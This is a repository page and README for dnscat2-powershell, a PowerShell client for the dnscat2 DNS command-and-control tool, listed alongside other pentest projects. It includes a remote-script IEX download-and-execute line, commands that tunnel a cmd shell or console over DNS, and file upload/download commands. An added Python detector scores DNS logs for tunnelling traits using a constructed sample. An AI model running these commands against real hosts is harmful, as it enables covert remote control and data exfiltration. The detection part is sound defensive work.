
lukebaggett / Dnscat2 Powershell

A Powershell client for dnscat2, an encrypted DNS command and control tool.


Projects that are alternatives of or similar to Dnscat2 Powershell

Elliot
A pentesting tool inspired by mr robot and derived by zphisher
Stars: ✭ 23 (-92.2%)
Mutual labels:  penetration-testing
Arachni
Web Application Security Scanner Framework
Stars: ✭ 2,942 (+897.29%)
Mutual labels:  penetration-testing
Novahot
A webshell framework for penetration testers.
Stars: ✭ 284 (-3.73%)
Mutual labels:  penetration-testing
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (-83.73%)
Mutual labels:  penetration-testing
Subscraper
Subdomain enumeration through various techniques
Stars: ✭ 265 (-10.17%)
Mutual labels:  penetration-testing
Penetration testing poc
POCs, exploits, scripts, privilege-escalation code, small tools and more related to penetration testing---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1207.8%)
Mutual labels:  penetration-testing
xss-chef
A web application for generating custom XSS payloads
Stars: ✭ 70 (-76.27%)
Mutual labels:  penetration-testing
Cheatsheet God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Stars: ✭ 3,521 (+1093.56%)
Mutual labels:  penetration-testing
Hacking Security Ebooks
Top 100 Hacking & Security E-Books (Free Download)
Stars: ✭ 3,232 (+995.59%)
Mutual labels:  penetration-testing
East
Exploits and Security Tools Framework 2.0.1
Stars: ✭ 283 (-4.07%)
Mutual labels:  penetration-testing
Writeups
This repository contains writeups for various CTFs I've participated in (Including Hack The Box).
Stars: ✭ 61 (-79.32%)
Mutual labels:  penetration-testing
Fsociety
A Modular Penetration Testing Framework
Stars: ✭ 259 (-12.2%)
Mutual labels:  penetration-testing
Faraday
Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distributing, indexing, and analyzing the data generated during a security audit.
Stars: ✭ 3,198 (+984.07%)
Mutual labels:  penetration-testing
PandorasBox
Security tool to quickly audit Public Box files and folders.
Stars: ✭ 56 (-81.02%)
Mutual labels:  penetration-testing
Osmedeus
Fully automated offensive security framework for reconnaissance and vulnerability scanning
Stars: ✭ 3,391 (+1049.49%)
Mutual labels:  penetration-testing
AriaCloud
A Docker container for remote penetration testing.
Stars: ✭ 105 (-64.41%)
Mutual labels:  penetration-testing
Free Security Ebooks
Free Security and Hacking eBooks
Stars: ✭ 3,132 (+961.69%)
Mutual labels:  penetration-testing
Hacker101 Ctf
Hacker101 CTF Writeup
Stars: ✭ 295 (+0%)
Mutual labels:  penetration-testing
Whatweb
Next generation web scanner
Stars: ✭ 3,503 (+1087.46%)
Mutual labels:  penetration-testing
Sitebroker
A cross-platform python based utility for information gathering and penetration testing automation!
Stars: ✭ 281 (-4.75%)
Mutual labels:  penetration-testing
- The upload and download functions inside the command session only work consistently with small files.
- Please use the original executable client if you require larger file transfers.

dnscat2 is a DNS covert channel tool by @iagox86 (Ron Bowes) which is used to transfer data over DNS requests.

This is a powershell version of the dnscat2 C client.

Click here for a blog post that gives a more detailed breakdown of the purpose of this script, and how to use it.

To use this script, you'll need the ruby dnscat2 server. Make sure to add the --no-cache option when running the server. This client is incompatible with the server's caching.

Setup

First, install the dnscat2 server. Start the server with caching disabled using --no-cache. The command to start your server should look something like this: ruby dnscat2.rb --dns="domain=example.com" --no-cache

Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Examples

Start-Dnscat2 is the actual function used as the client. Specify the dnscat2 server using -Domain.

Start a command session, and send DNS requests to 8.8.8.8 on port 53:
    Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 8.8.8.8

Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:
    Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd

Start a console session. Only use CNAME, MX, and AAAA requests:
    Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console

Do not encrypt the session. Encryption is enabled by default.
    Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption

Powershell Command Session Commands

The client can handle normal dnscat2 commands, or the powershell version of that command. To use the powershell version of a command, set the specific parameters the client detects (these are commands run from a command session on the server):

Start a new session which simulates a Powershell shell, like ExecPS:
    exec psh

Upload app.exe on the server into a hex string stored in the $app powershell variable:
    upload app.exe hex:$app

Download the byte array stored in the $app powershell variable to app.exe on the server:
    download bytes:$app app.exe

Start-Dnscat2

-Domain <String>          The Domain being used by the dnscat2 server.
-DNSServer <String>       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)
-DNSPort <Int32>          The port to send DNS queries to. (Default: 53)

-Command                  Start a command session. (Default)
-Exec <String>            Link the I/O of a process with the Dnscat2 session.
-Console                  Link the I/O of the console with the Dnscat2 session.
-ExecPS                   Simulate a Powershell session and link the I/O with the Dnscat2 session.
                          WARNING: Exiting will kill the entire dnscat2 client, not just the session.

-PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.
-NoEncryption             Do not use encryption.

-LookupTypes <String[]>   Set an array of lookup types to randomly switch between.
                          Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)
-Delay <Int32>            Set a delay between each request, in milliseconds. (Default: 0)
-MaxRandomDelay <Int32>   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
-MaxPacketSize <Int32>    Maximum length of a dnscat2 packet. (Default: 240)
-Name <String>            The name of your dnscat2 session. (Default: hostname)
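
The parameters above (random switching between TXT, MX and CNAME lookups, configurable delays, 240-byte packets carried in query names) describe what this channel looks like on the wire, which is what a defender has to key on. The following is an added example, not code from dnscat2-powershell or dnscat2, that scores DNS query logs for covert-channel traits: many long, high-entropy query names under a single domain with almost no repetition and a bias towards the TXT/MX/CNAME record types the client uses by default. The log line format, the "registrable domain is the last two labels" shortcut, the sample lines and every threshold are assumptions chosen for this constructed sample, not values taken from the project.

```python
import math
from collections import defaultdict

# Record types dnscat2-powershell rotates between by default (per its README);
# A/AAAA are also supported, so this is one signal among several, not proof.
TUNNEL_TYPES = {"TXT", "MX", "CNAME"}

# Constructed sample log. Assumed format: "<time> <client-ip> <qtype> <qname>".
# The example.com lines imitate hex-encoded payloads; example.org is ordinary traffic.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.org
10:00:02 10.0.0.5 AAAA mail.example.org
10:00:03 10.0.0.7 TXT 9f3e1a7c2b5d8e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f.5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b.c2.example.com
10:00:04 10.0.0.7 MX 7d2c1b0a9f8e7d6c5b4a39281706f5e4d3c2b1a0f9e8d7c6b5a4938271605f4e.3d2c1b0a9f8e7d6c5b4a39281706f5e4d3c2b1a0.c2.example.com
10:00:05 10.0.0.7 CNAME 1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6f708192a3b4c5d6e7f809.1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d.c2.example.com
10:00:06 10.0.0.7 TXT 00ff11ee22dd33cc44bb55aa66997788a9b8c7d6e5f4a3b2c1d0e1f2a3b4c5d6.e7f8091a2b3c4d5e6f708192a3b4c5d6e7f8091a.c2.example.com
10:00:07 10.0.0.5 A cdn.example.org
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; hex-encoded data sits close to 4.0."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (registrable domain, subdomain text without dots).

    Assumption: the registrable domain is the last two labels. A real deployment
    should use the Public Suffix List instead (co.uk, etc. break this rule).
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), "".join(labels[:-2])


def parse_line(line: str):
    """Parse one assumed-format log line; returns None for lines that do not fit."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qtype, qname = parts
    return {"ts": ts, "client": client, "qtype": qtype.upper(), "qname": qname}


def score_domains(lines, min_queries=3, min_len=40, min_entropy=3.0,
                  min_unique=0.9, min_tunnel_types=0.5):
    """Aggregate per registrable domain and flag covert-channel-like traffic.

    All thresholds are assumptions for this sample; tune them against a baseline
    of your own resolver logs before relying on them.
    """
    per_domain = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base, sub = split_name(rec["qname"])
        per_domain[base].append((sub, rec["qtype"]))

    results = {}
    for base, recs in per_domain.items():
        n = len(recs)
        mean_len = sum(len(s) for s, _ in recs) / n
        mean_entropy = sum(shannon_entropy(s) for s, _ in recs) / n
        unique_ratio = len({s for s, _ in recs}) / n          # tunnels rarely repeat a name
        tunnel_ratio = sum(1 for _, t in recs if t in TUNNEL_TYPES) / n
        results[base] = {
            "queries": n,
            "mean_subdomain_len": round(mean_len, 1),
            "mean_entropy": round(mean_entropy, 2),
            "unique_ratio": round(unique_ratio, 2),
            "tunnel_type_ratio": round(tunnel_ratio, 2),
            "suspicious": (n >= min_queries and mean_len >= min_len
                           and mean_entropy >= min_entropy
                           and unique_ratio >= min_unique
                           and tunnel_ratio >= min_tunnel_types),
        }
    return results


def suspicious_domains(log_text: str):
    """Convenience wrapper: sorted list of domains flagged in a log blob."""
    return sorted(d for d, r in score_domains(log_text.splitlines()).items()
                  if r["suspicious"])


if __name__ == "__main__":
    for domain, stats in score_domains(SAMPLE_LOG.splitlines()).items():
        print(domain, stats)
```

The per-domain aggregation matters more than any single feature: one long TXT query is normal (SPF, DKIM), but dozens of unique, near-maximum-entropy names under one domain within seconds are not, and the -Delay and -MaxRandomDelay options only stretch that burst out, they do not change the shape of the names. Pair this with resolver-level blocking of the flagged domain rather than trying to inspect the encrypted payload, since the page notes the session is encrypted by default.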

ExecPS and 'exec psh'

dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. Watch out for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.
